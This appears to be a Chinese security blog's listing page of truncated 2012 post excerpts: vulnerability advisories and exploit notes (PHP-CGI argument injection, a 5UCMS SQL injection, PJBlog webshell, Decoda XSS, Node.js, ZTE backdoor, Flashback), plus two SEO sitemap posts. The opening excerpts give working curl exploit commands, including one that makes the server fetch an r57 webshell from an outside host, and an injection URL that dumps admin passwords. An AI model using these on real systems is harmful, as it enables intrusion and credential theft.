1、本地包含直接执行代码: curl -H “USER-AGENT: <?system(‘id’);die();?>” http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 2、远程包含执行代码: curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.closes.in/r57.txt........
无忧网络文章管理系统(5UCMS)注入漏洞
后台地址:admin/Login.asp 数据库路径:inc/db 目录下 漏洞地址: admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_A........
PJBlog 3.2.9.518 Getwebshell 漏洞
版本:PJblog 3.2.9.518(2012/5/9日时为最新版本) 漏洞利用条件: 1、使用全静态模式(默认情况是全静态模式) 2、用户可以发帖(默认普通用户不能发帖,所以有点鸡肋) 漏洞描述:PJblog 3.2.9.518使用js过滤特殊字符,在使用全静态模式下,普通用户发帖即可插入asp一句话木马。 PJblog 3.2.9.518的........
Decoda跨站脚本漏洞
Decoda 3.3.3之前版本中存在跨站脚本漏洞,该漏洞源于对用户提供的输入未经正确过滤。 攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书进而发起其他攻击。 目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最........
Node.js HTTP解析漏洞
表示暂时没有nodejs的领域,而nodejs在国内我也就在阿里云上见过一次,所以发到这来。 poc在这:https://gist.github.com/2628868 官方公告在这:http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/ 简单翻译一下,由于StringPtr里Updae方法存在错误,(如何触发........
中兴(ZTE)手机存在后门,可获得 Root Shell
It’s appearing that a root backdoor has appeared in ZTE phones, allowing full root to devices. It simply provides a root shell using a hard-coded password. This is serious news for any hackers, as this command can cause major damage to phones. Here is the information, should you wish to hav........
HTTP协议头注射漏洞实例
HTTP 响应头文件中包含未经验证的数据会引发 cache-poisoning、cross-site scripting、cross-user defacement、page hijacking、cookie manipulation 或 open redirect。 HTTP协议头注射漏洞原理 以下情况中会出现 HTTP协议头注射漏洞: 1. 数据通过一个不可信赖的数据源进入 Web 应用程序,最常见的是 HTTP 请求。........
苹果为10.5发布安全更新,新加入Flashback移除工具
虽然苹果在Flashback恶意软件爆发之后很快为OS X Lion和雪豹系统用户推出了专门的移除工具,但正在使用Mac OS X 10.5或更早系统的用户就无法获得Flashback移除工具。今天,苹果终于发布了Mac OS X 10.5安全更新,为10.5加入了Flashback移除工具并禁用Safari中的Java插件。 这款安全补丁 的容量为1.23MB ,最低系统要求........
网站推广之网站地图知识大全(二)
昨天给大家介绍了一下有关网站地图的定义和作用,今天百度推广明锐网络继续跟大家分享网站地图的制作方法及SEO优化步骤。 现在的网站地图一般有两种常用的格式,一种是xml格式的,另外一种是html格式,xml格式的网站地图要相对于简单一些,可以直接在网上下载一个软件然后用软件生成在提交给各大搜索引擎就可........
网站推广之网站地图知识大全(一)
网站地图知识大全(一) 经常有很多新手站长会问什么是网站地图?网站地图有什么作用?因为他们看到别人网站底部经常加上网站地图、百度地图,谷歌地图及RSS地图。而对这些概念很模糊,今天明锐百度SEO公司给您总结一下有关于网站地图的知识。 网站地图是一个网站所有链接的容器。网站地图可以方便搜索........
近期评论